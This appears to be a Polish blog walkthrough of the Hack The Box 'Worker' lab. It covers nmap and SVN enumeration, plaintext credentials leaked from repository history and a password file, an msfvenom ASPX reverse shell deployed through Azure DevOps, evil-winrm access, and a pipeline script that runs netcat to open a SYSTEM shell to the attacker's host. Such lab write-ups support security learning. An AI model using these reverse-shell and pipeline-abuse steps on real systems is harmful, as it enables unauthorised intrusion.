Worker

Nmap

nmap -sC -sV -p- -T4 -Pn 10.10.10.203            
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-24 19:09 BST
Nmap scan report for 10.10.10.203
Host is up, received user-set (0.036s latency).
Not shown: 65532 filtered ports
Reason: 65532 no-responses
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE  REASON          VERSION
80/tcp   open  http     syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
3690/tcp open  svnserve syn-ack ttl 127 Subversion
5985/tcp open  http     syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

User

Na porcie 80 widzimy standardową stronę IIS.
Port 3690 pokazuje nam repozytorium SVN ( coś podobnego to GIT’a) możemy to enumerować.

svn info svn://worker.htb

Ścieżka: .
URL: svn://worker.htb
Relative URL: ^/
Katalog główny repozytorium: svn://worker.htb
UUID repozytorium: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Wersja: 5
Rodzaj obiektu: katalog
Autor ostatniej zmiany: nathen
Ostatnio zmieniona wersja: 5
Data ostatniej zmiany: 2020-06-20 14:52:00 +0100 (sob)
svn list svn://worker.htb

dimension.worker.htb/
moved.txt

Znajdujemy folder i plik możemy je eksportować i zobaczyć co jest w środku.

A    svn
A    svn/dimension.worker.htb
A    svn/dimension.worker.htb/LICENSE.txt
A    svn/dimension.worker.htb/README.txt
A    svn/dimension.worker.htb/assets
A    svn/dimension.worker.htb/assets/css
A    svn/dimension.worker.htb/assets/css/fontawesome-all.min.css
A    svn/dimension.worker.htb/assets/css/main.css
A    svn/dimension.worker.htb/assets/css/noscript.css
A    svn/dimension.worker.htb/assets/js
A    svn/dimension.worker.htb/assets/js/breakpoints.min.js
A    svn/dimension.worker.htb/assets/js/browser.min.js
A    svn/dimension.worker.htb/assets/js/jquery.min.js
A    svn/dimension.worker.htb/assets/js/main.js
A    svn/dimension.worker.htb/assets/js/util.js
A    svn/dimension.worker.htb/assets/sass
A    svn/dimension.worker.htb/assets/sass/base
A    svn/dimension.worker.htb/assets/sass/base/_page.scss
A    svn/dimension.worker.htb/assets/sass/base/_reset.scss
A    svn/dimension.worker.htb/assets/sass/base/_typography.scss
A    svn/dimension.worker.htb/assets/sass/components
A    svn/dimension.worker.htb/assets/sass/components/_actions.scss
A    svn/dimension.worker.htb/assets/sass/components/_box.scss
A    svn/dimension.worker.htb/assets/sass/components/_button.scss
A    svn/dimension.worker.htb/assets/sass/components/_form.scss
A    svn/dimension.worker.htb/assets/sass/components/_icon.scss
A    svn/dimension.worker.htb/assets/sass/components/_icons.scss
A    svn/dimension.worker.htb/assets/sass/components/_image.scss
A    svn/dimension.worker.htb/assets/sass/components/_list.scss
A    svn/dimension.worker.htb/assets/sass/components/_table.scss
A    svn/dimension.worker.htb/assets/sass/layout
A    svn/dimension.worker.htb/assets/sass/layout/_bg.scss
A    svn/dimension.worker.htb/assets/sass/layout/_footer.scss
A    svn/dimension.worker.htb/assets/sass/layout/_header.scss
A    svn/dimension.worker.htb/assets/sass/layout/_main.scss
A    svn/dimension.worker.htb/assets/sass/layout/_wrapper.scss
A    svn/dimension.worker.htb/assets/sass/libs
A    svn/dimension.worker.htb/assets/sass/libs/_breakpoints.scss
A    svn/dimension.worker.htb/assets/sass/libs/_functions.scss
A    svn/dimension.worker.htb/assets/sass/libs/_mixins.scss
A    svn/dimension.worker.htb/assets/sass/libs/_vars.scss
A    svn/dimension.worker.htb/assets/sass/libs/_vendor.scss
A    svn/dimension.worker.htb/assets/sass/main.scss
A    svn/dimension.worker.htb/assets/sass/noscript.scss
A    svn/dimension.worker.htb/assets/webfonts
A    svn/dimension.worker.htb/assets/webfonts/fa-brands-400.eot
A    svn/dimension.worker.htb/assets/webfonts/fa-brands-400.svg
A    svn/dimension.worker.htb/assets/webfonts/fa-brands-400.ttf
A    svn/dimension.worker.htb/assets/webfonts/fa-brands-400.woff
A    svn/dimension.worker.htb/assets/webfonts/fa-brands-400.woff2
A    svn/dimension.worker.htb/assets/webfonts/fa-regular-400.eot
A    svn/dimension.worker.htb/assets/webfonts/fa-regular-400.svg
A    svn/dimension.worker.htb/assets/webfonts/fa-regular-400.ttf
A    svn/dimension.worker.htb/assets/webfonts/fa-regular-400.woff
A    svn/dimension.worker.htb/assets/webfonts/fa-regular-400.woff2
A    svn/dimension.worker.htb/assets/webfonts/fa-solid-900.eot
A    svn/dimension.worker.htb/assets/webfonts/fa-solid-900.svg
A    svn/dimension.worker.htb/assets/webfonts/fa-solid-900.ttf
A    svn/dimension.worker.htb/assets/webfonts/fa-solid-900.woff
A    svn/dimension.worker.htb/assets/webfonts/fa-solid-900.woff2
A    svn/dimension.worker.htb/images
A    svn/dimension.worker.htb/images/bg.jpg
A    svn/dimension.worker.htb/images/overlay.png
A    svn/dimension.worker.htb/images/pic01.jpg
A    svn/dimension.worker.htb/images/pic02.jpg
A    svn/dimension.worker.htb/images/pic03.jpg
A    svn/dimension.worker.htb/index.html
A    svn/moved.txt
Wyeksportowano wersję 5.

Plik moved.txt zawiera kolejną subdomenę

cat moved.txt
This repository has been migrated and will no longer be maintaned here.
You can find the latest version at: http://devops.worker.htb

// The Worker team :)

Dodajemy subdomeny “devops” oraz “dimensions” do /etc/hosts
Dimensions to rabbit hole… Natomiast Devops pokazuje nam Basic Auth więc potrzebujemy credentiali.
Kontynuujemy enumerację repozytorium.

svn log svn://worker.htb  

------------------------------------------------------------------------
r5 | nathen | 2020-06-20 14:52:00 +0100 (sob) | 1 linia

Added note that repo has been migrated
------------------------------------------------------------------------
r4 | nathen | 2020-06-20 14:50:20 +0100 (sob) | 1 linia

Moving this repo to our new devops server which will handle the deployment for us
------------------------------------------------------------------------
r3 | nathen | 2020-06-20 14:46:19 +0100 (sob) | 1 linia

-
------------------------------------------------------------------------
r2 | nathen | 2020-06-20 14:45:16 +0100 (sob) | 1 linia

Added deployment script
------------------------------------------------------------------------
r1 | nathen | 2020-06-20 14:43:43 +0100 (sob) | 1 linia

First version
------------------------------------------------------------------------

Widać info o skrypcie warto go ściągnąć i zobaczyć co jest w środku.

svn checkout -r2  svn://worker.htb
A    deploy.ps1
Pobrano wersję 2.
cat deploy.ps1 
$user = "nathen" 
$plain = "wendel98"
$pwd = ($plain | ConvertTo-SecureString)
$Credential = New-Object System.Management.Automation.PSCredential $user, $pwd
$args = "Copy-Site.ps1"
Start-Process powershell.exe -Credential $Credential -ArgumentList ("-file $args")

Znajdujemy dane logowania, którymi próbujemy się zalogować do serwera Web.

"nathen" : "wendel98"

Widzimy stronę “Azure DevOps” z Projektem SmartHotel360.
W zakładce repos można stworzyć swój branch i uploadować pliki.
Na początek generujemy revshell.

msfvenom -f aspx -p windows/x64/shell_reverse_tcp LHOST=10.10.14.66 LPORT=9090 -o rev.aspx

msfconsole
handler -p windows/x64/shell_reverse_tcp -H 10.10.14.66 -P 9090
Wchodzimy w Branches i tworzymy swój nowy branch.
wrzucamy nasz plik rev.aspx

Następnie tworzymy Pull Request i robimy Merge’a.
Zapomniałem dodać że to wszystko robimy w BRANCHu “Spectral”

Ostatecznie wchodzimy na:
http://spectral.worker.htb/rev.aspx
i mamy Reverse Shell’a

Wrzucamy winPEAS na box’a i sprawdzamy co jest tam ciekawego.
Na pierwszy rzut oka widzimy dodatkowy share

_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [+] CURRENT SHARES <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-

Share name   Resource                        Remark

-------------------------------------------------------------------------------
C$           C:\                             Default share                     
IPC$                                         Remote IPC                        
W$           W:\                             Default share                     
ADMIN$       C:\Windows                      Remote Admin                      
The command completed successfully.
    Directory: W:\


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----       2020-06-16     18:59                agents                                                                
d-----       2020-03-28     14:57                AzureDevOpsData                                                       
d-----       2020-04-03     11:31                sites                                                                 
d-----       2020-06-20     16:04                svnrepos  

Znajdujemy plik z użytkownikami i hasłami.

PS W:\svnrepos\www\conf> cat passwd
cat passwd
### This file is an example password file for svnserve.
### Its format is similar to that of svnserve.conf. As shown in the
### example below it contains one section labelled [users].
### The name and password for each user follow, one account per line.

[users]
nathen = wendel98
nichin = fqerfqerf
nichin = asifhiefh
noahip = player
nuahip = wkjdnw
oakhol = bxwdjhcue
owehol = supersecret
paihol = painfulcode
parhol = gitcommit
pathop = iliketomoveit
pauhor = nowayjose
payhos = icanjive
perhou = elvisisalive
peyhou = ineedvacation
phihou = pokemon
quehub = pickme
quihud = kindasecure
rachul = guesswho
raehun = idontknow
ramhun = thisis
ranhut = getting
rebhyd = rediculous
reeinc = iagree
reeing = tosomepoint
reiing = isthisenough
renipr = dummy
rhiire = users
riairv = canyou
ricisa = seewhich
robish = onesare
robisl = wolves11
robive = andwhich
ronkay = onesare
rubkei = the
rupkel = sheeps
ryakel = imtired
sabken = drjones
samken = aqua
sapket = hamburger
sarkil = friday

W “C:\Users” widzimy, że mamy użytkownika robisl więc próbujemy się na niego dostać

evil-winrm.rb -i 10.10.10.203 -u robisl -p wolves11
*Evil-WinRM* PS C:\Users\robisl\Desktop> cat user.txt
6556b48734963***779579b8b5a60f

Administrator

Na samym box’ie nie ma nic ciekawego. Możemy natomiast zalogować się na Azure z danymi logowania które znaleźliśmy wcześniej.
Tym razem widzimy inny projekt “PartsUnlimited”

Tym razem spróbujemy stworzyć nowy Pipeline.
Pierwsze co robimy to wrzucamy netcat’a

*Evil-WinRM* PS C:\Users\robisl\Documents> upload nc64.exe
tworzymy Nowy Pipeline
Wybieramy Azure Repos Git, a następnie PartsUnlimited
Wybieramy Starter Pipeline
Kasujemy jedną linijkę pool, a następnie zmieniamy linijkę script
# Starter pipeline
# Start with a minimal pipeline that you can customize to build and deploy your code.
# Add steps that build, run tests, deploy, and more:
# https://aka.ms/yaml

trigger:
- master

steps:
- script: powershell.exe -c "C:\Users\robisl\Documents\nc64.exe 10.10.14.66 9092 -e powershell.exe"
  displayName: 'Run a one-line script'

- script: |
    echo Add other tasks to build, test, and deploy your project.
    echo See https://aka.ms/yaml
  displayName: 'Run a multi-line script'

Na lokalnej maszynie mamy już ustawiony nasłuch.

PS W:\agents\agent11\_work\10\s> whoami
nt authority\system
PS C:\users\administrator\Desktop> cat root.txt

950b46f465b278***438cc76658c

Leave a Comment